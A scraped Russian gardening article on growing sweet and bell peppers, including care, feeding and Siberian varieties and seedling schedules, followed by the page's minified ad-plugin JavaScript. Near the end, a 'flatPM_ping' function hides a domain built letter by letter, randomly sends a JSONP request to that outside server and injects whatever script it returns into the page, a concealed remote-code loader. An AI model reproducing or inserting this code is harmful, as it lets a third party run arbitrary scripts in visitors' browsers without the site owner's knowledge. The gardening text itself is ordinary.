Нельзя сажать рядом сладкий и горький перец, растения переопыляются и плоды у сладкого перца получаются горькими. Обязательно нужно следить за перепадом температур, лучше себя подстраховать и на ночь укрыть растения.

Уход за посадками перца

Некоторые огородники делают большую и серьёзную ошибку, высевая перец раньше положенного срока. В итоге, рассада перерастает, высаживают её уже с цветочками, иногда даже с маленькими перчиками. Такая рассада долго болеет и потом отстаёт в развитии.

Правильно выращенная и вовремя посаженная рассада идёт в рост уже через неделю, вы сразу же заметите на верхушках кустиков молоденькие листочки.

Полив перца

В отличии от томатов перец нужно поливать часто, но понемногу. В жаркие летние дни приходится поливать через день по 3-4 литра под куст. В открытом грунте всё-таки испарения больше, чем в теплице и нормы полива несколько другие. В обычные дни хватает пары поливов в неделю по два-три литра.

Поливают перец утром или под вечер, только тёплой водой, температура воды должна быть примерно одинаковой с температурой грунта. Нельзя поливать перец на листья и стебли, только под корень.

При созревании плодов поливать следует реже, через 3-4 дня. А вообще, следите за растениями, если листочки начинают увядать, то воды им мало.

Рыхление

Перец просто обожает рыхлую почву. Рыхление для него важнее полива. После этой процедуры увеличивается доступ кислорода к корням, который, как известно, помогает растениям быстрее поглощать микроэлементы, содержащиеся в почве.

Первое рыхление проводим после первого полива, то есть, когда уже растения укоренились и начали расти. Рыхление делаем не глубже 7-ми см, так как есть опасность повредить корни.

Обычно рыхлят перцы, если нет мульчи, после каждого полива или дождя. Когда растения начинают цвести, их начинают окучивать. Это мероприятие позволяет увеличить урожай.

Подкормки

Без подкормок не будет хорошего урожая, это известно. Перец не любит переизбытка минеральных удобрений, лучше не докормить, чем перекормить. Органика тоже хороша в меру.

  1. Первую подкормку я провожу через две недели после высадки перца в грунт. Эта подкормка птичьим помётом, разведённая 1 к 15 и совмещённая с поливом
  2. Вторая подкормка перед цветением для лучших завязей — комплексным минеральным удобрением с настоем коровяка, разведённым 1 к 10-ти.
  3. Во время завязывания плодов обязательна третья подкормка органикой с добавлением калийных удобрений.

Между этими подкормками я ещё иногда провожу полив настоем сорняков. Крапиву, полынь, другие травы заливаю водой и неделю настаиваю на солнышке, потом развожу дополнительно водой и поливаю по два литра под куст.

Пасынкование и формирование куста

Перец, как и многие паслёновые требует пасынкования, кроме непасынкующихся сортов. Пасынки удаляются на протяжении всего лета, проводится процедура ножницами, в жаркую погоду, чтобы ранка сразу подсохла. Можно обрабатывать срезы древесным углём, чтобы не было заражения.

В начале августа, когда большинство плодов уже завязались, нужно сделать прищипывание, удалить точку роста куста и оборвать все соцветия, так как эти плоды созреть уже не успеют, но будут мешать уже выросшим.

Кусты растения формируются в зависимости от сорта, есть компактные кустики, а есть сильно ветвящиеся. Вот такие и нужно постоянно просматривать, удалять мешающие побеги и те, которые растут внутрь куста.

После появления завязей нужно удалять все нижние побеги, ниже веточек с плодами. Раз в неделю проводите обрезку побегов, которые слишком затеняют и загущают куст.

Болезни и вредители

Перцы при правильном уходе гораздо устойчивее к болезням, чем помидоры. Но на них чаще появляются вредители:

  • Тля
  • Белокрылка
  • Колорадский жук
  • Совка
  • Слизни
  • Медведка

Большинство этих вредителей можно собирать вручную, медведку удаляют с помощью ловушек. С тлёй легко бороться с помощью водного раствора древесной золы.

Сбор урожая

Перец созревает постепенно, некоторые не дожидаются, снимают плоды для дозаривания. Это можно делать, если плоды перегружают куст.

Есть множество блюд, где используется сладкий перец, прежде всего салаты, тушёный и жареный, фаршированный и запечённый, он хорош во всех видах.

Плоды сладкого перца на зиму можно заморозить, предварительно вынув семена. А можно использовать в домашнем консервировании, ближе к осени я обязательно поделюсь с вами вкусными рецептами. А ещё на зиму можно перенести перец домой. Для этого нужно выкопать его с большим комом земли и посадить в цветочный горшок. Он будет цвести до декабря.

Если технология выращивания сладкого перца соблюдена, вам хватит 5-6 кустиков. чтобы обеспечить этим овощем вашу семью. Лучше посадить меньше и дать растениям хороший уход, тогда вы точно будете с урожаем.

Правильная посадка и выращивание болгарского перца в Сибири

Без сладкого перца не обходится ни один настоящий огород. Его пряный аромат и яркий вкус покорили сердца людей во всем мире. Вырастить перцы для Сибири – задача не из легких. Однако это не останавливает садоводов, которые выращивают на сибирских просторах абрикосы и персики. Для успешного культивирования тропического овоща важно знать, когда садить перец на рассаду в Сибири. Агротехника выращивания, посадка в теплице должна соответствовать биологическим особенностям овоща и климату региона.

Выбор сорта

Излишне говорить, что в суровых сибирских условиях вырастить тропический овощ сложно. Без теплицы здесь не обойтись. Кроме нее для успеха дела обязательно следует выбирать районированные сорта.

Конечно, сибирский регион необычайно обширен и разнообразен по климатическим условиям. Выращивание перца в Забайкальском крае очень отличается от выращивания в Томской области, климат на Алтае не сравнишь с севером Красноярского края.

По климатическим условиям Сибирь делится на Западносибирский и Восточносибирский регионы. Летний период в Западносибирском регионе характеризуется диапазоном температур от +15 °С до +35 °С, что вполне подходит для выращивания перцев. В Восточной Сибири максимальная летняя температура не превышает +15 °С.

О трудностях выращивания перца в Сибири возможно судить по количеству зонированных сортов, представленных в Госреестре РФ. Из 743 сортов всего 16 определены для культивирования в Сибири, то есть 2% от общего количества. Из них 4 выведено для товарного производства, а 12 – для садово-огородного использования в личных хозяйствах.

Важно! Перцы для Сибири выращиваются раннего, среднераннего и среднего сроков созревания.

Районированные для Восточной Сибири:

  • ранние — Крепыш, Свежесть;
  • средние – Капитошка, Катюша, Улов.

Районированные для Западной Сибири:

  • ранние – Викинг, Валентинка, Кавалер, Купец, Первенец Романова, Факир;
  • средние – Золотой телец, Изюминка, Сибирский князь.

Всего три сорта перцев выведены для использования на всей территории Сибири:

  • ранний Викинг;
  • среднеранняя Ласточка;
  • среднего срока Морозко.

Описание сибирских сортов

Перцы выведены для произрастания на грядках и в закрытом грунте. Их употребляют свежими в салатах, в переработке, фаршировании, изготовлении «лечо».

  1. Крепыш – раннеспелый, растение высотой не более 0,5 м, красные плоды весят 70 грамма, с шириной стенок 5 мм, отличного вкуса. По содержанию аскорбиновой кислоты превышает стандартные показатели. Урожайность до 4 кг/кв. м.
  2. Катюша – среднеспелый, средней высоты. Желтые плоды отличного вкуса весят 90 грамм, толщина стенок 5 мм. Имеет повышенным содержанием аскорбиновой кислоты. Урожайность около 3 кг/кв. м., невосприимчив к грибковым заболеваниям.
  3. Викинг – раннеспелый, красные плоды хорошего вкуса весят 100 грамм, толщина стенок 5 мм. Урожайность 3 кг/кв.м.
  4. Валентинка – низкорослый куст с ярко-красными узкоконусовидными плодами, растущими вверх. Имеет отличный вкус плодов с массой 60 грамм, толщиной стенок 5 мм. Урожайность 2 кг/кв. м.
  5. Первенец Романцова – раннеспелый, красные плоды имеют небольшую массу 50 грамм, ширину стенок 4 мм. Ценность сорта заключается в отличном вкусе и самом большом количестве аскорбиновой кислоты – 232 мг на 100 гр сырого вещества.
  6. Золотой телец — среднеспелый, темно-оранжевые плоды вырастают весом до 150 грамма, толщина стенки 10 мм, отличного вкуса. Урожайность 3 кг/кв. м.
  7. Изюминка – среднеспелый, имеет самые крупные плоды желтого цвета и среднего веса 170 граммов, с толстыми стенками 8 мм, отличным вкусом. Урожайность до 3 кг/кв. м.
  8. Широко известный сорт Ласточка – среднеранний, до технического созревания проходит 106—130 дней, салатовые плоды имеют весом 89 грамм, со стенками толщиной 7 мм, и отличного вкуса. Урожайность до 5 кг/кв. м.

В магазинах продается огромное количество пакетиков с семенами. Но на них не указано, в каких регионах овощи районированы. Часто описание не соответствует данным, определенным в характеристиках Госреестра.

Сортовые характеристики овощей, внесенных в Госреестр, проходят длительные испытания на однородность, стабильность, полезность и отличие от других сортов. Испытания длятся не один год и проходят в разных точках, с полным соблюдением агротехники.

Важно! В список Госрееста никогда не попадут генномодифицированные растения.

Перцы для Сибири имеют огромное значение не только как очень вкусный продукт, но и как овощ, богатый витаминами, полезными веществами и элементами.

Подготовка семян

Сроки посева семян зависят от сорта. Среднеспелые сорта сажают в феврале, ранние – в марте.

Если рассада посажена в феврале, то возникает проблема качественной подсветки сеянцев в течение 12 часов и обеспечения высокой температуры.

Посадка в марте хороша тем, что для рассады достаточно естественного освещения.

Когда сеять семена, зависит от сорта и наличия обогреваемой и необогреваемой теплицы:

  • в конце февраля сажают среднеспелые сорта для теплиц;
  • в середине марта сеют высокорослые сорта для обогреваемых теплиц;
  • в начале апреля сеют для необогреваемых теплиц;
  • в конце марта сеют сорта для выращивания в грунте под временным укрытием;
  • в начале июня высаживают мелкоплодные скороспелые сорта без укрытий.

Календарь высадки семян, составленный заранее, очень поможет садоводу не пропустить правильное время посадки.

Посев семян начинается с проверки их жизнеспособности в соленой воде. Семена бросают в 5% соляной раствор и отбирают те, которые опускаются на дно. Семена, оставшиеся на плаву, выбрасывают.

Промыв от остатков соли, их опускают в 1% раствор марганцовки для дезинфекции. Через полчаса раствор сливают, семена промывают.

Для увеличения количества проросших семян и силы их роста, используют барботирование семян перца – насыщение их кислородом. Поместив их в емкость с водой, опускают в нее аквариумный компрессор и в течение суток пропускают через воду кислород.

Дальше семена надо поместить во влажную ткань для наклевывания ростков. Лучше всего замочить их на 2—4 суток в растворе микроэлементов или стимуляторах роста. Подойдет Эпин-Экстра, Циркон, Микровит, настой золы.

Сеем семена неглубоко, на 0,5 см от поверхности, только во влажную почву. Полив почву после посадки, закрывают ящик пленкой и оставляют в покое до появления первых всходов.

Важно! В это время важно не допустить пересыхания почвы и поддерживать оптимальную температуру.

Семена до появления всходов держат при температуре +25—28 °С. В таких условиях всходы появляются в течение недели. Затем, после появления всходов, температуру опускают до +19—20 °С на 4—5 дня, чтобы сформировать крепкие корни. Дальше рассада растет при +22—25 °С до пересадки.

Всхожесть семян составляет 60—70%, при пересадках гибнет еще 15% от количества взошедших сеянцев. Поэтому сажать надо с запасом.

Очень удобно сажать перцы на рассаду в торфяные таблетки или ячейки кассет. Это существенно экономит количество потраченных семян, земли, воды, саженцы не пикируются. После пикировки сеянцы трудно приживаются, так как корни долго восстанавливаются. Пересадка в грунт задерживается на 10—14 дней.

Уход за рассадой

Для успешного выращивания перца на рассаду важно соблюдать правила ухода за ней:

  • поддержание оптимальной температуры;
  • обеспечение полива и надлежащей влажности;
  • своевременная подкормка;
  • проветривание при излишней влажности;
  • создание короткого светового дня;
  • закаливание перед пересадкой.

Посадки поливают только теплой водой. Хороши внекорневые поливы.

Короткий световой день создают, прикрыв рассаду светонепроницаемой крышкой после 19.00 часов. При продолжительном световом дне теряется урожайность.

Важно следить, чтобы корни рассады не прорастали сквозь таблетки и переплелись в ячейке. Сеянцы растут в горшочках 2—2,5 месяца, то ее необходимо вовремя пересаживать в большие емкости. Их сначала переваливают в стаканчики 0,5 литров, а затем в литровые стаканчики.

Перцы для Сибири за 2 недели до пересадки в огород начинают закаливать. Сначала открывают форточки на несколько часов, а затем – на целый день.

Сроки перевалки рассады зависят от места посадки:

  • в начале мая в теплице с обогревом;
  • в конце мая под пленочный парник;
  • в начале июня просто на грядку без укрытий.

Уход на грядках

Перец любит солнце и воду. Грядки не должны располагаться в тени. Также посадки должны быть защищены от ветров стеной строения или кулисной посадкой высоких растений – подсолнуха, топинамбура, амаранта.

Грядки готовят заранее, перекапывая почву с перегноем, золой. Главное условие хорошего урожая – легкая и рыхлая почва, которая обеспечит доступ к корням кислорода и воды.

Температура грунта при пересадке должна быть не менее +15 °С на глубине в 10 см. Для поднятия температуры используют «теплые» грядки. Для этого на глубине в штык лопаты делают слой растительных остатков, пересыпав их пометом или перегноем. Сверху насыпают слой рыхлой, пушистой земли и проливают ее горячей водой. Начинается процесс гниения, температура на грядке поднимается.

При пересадке рассады лунки для растений проливают 2 литрами воды. После посадки рассаду опять поливают и мульчируют старым компостом или перегноем. Перец не переносит ни засухи, не застоя воды. Установить правильный водный баланс позволяет мульча из компоста или сена.

Перец легко заболевает грибковыми болезнями, поэтому использовать в качестве мульчи скошенную траву не желательно. По этой же причине подкармливать его настоем травы с навозом также не стоит.

Значительные дозы удобрений ведут к загниванию корней и накоплению в плодах нитратов. Поэтому подкармливать растения надо часто, но понемногу. Подойдет настой золы. Когда температура опускается ниже комфортного значения +20 °С, хорошо проводить листовые подкормки. При такой температуре корни плохо всасывают воду, внекорневой полив становится «палочкой-выручалочкой».

Обладая слабыми корнями, перец нуждается в прополке и удалении сорных трав. Также он хорошо себя чувствует после окучивания влажной землей. У него отрастают дополнительные корни, которые увеличивают устойчивость и питание.

Заключение

Перцы для Сибири так же важны, как и томаты, огурцы, баклажаны, которые успешно растут в сибирской земле. Аскорбиновую кислоту, витамины и антиоксиданты можно получить только из овощей, выросших в месте их потребления. А значит надо приложить максимум усилий, чтобы они росли и дарили щедрый урожай.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};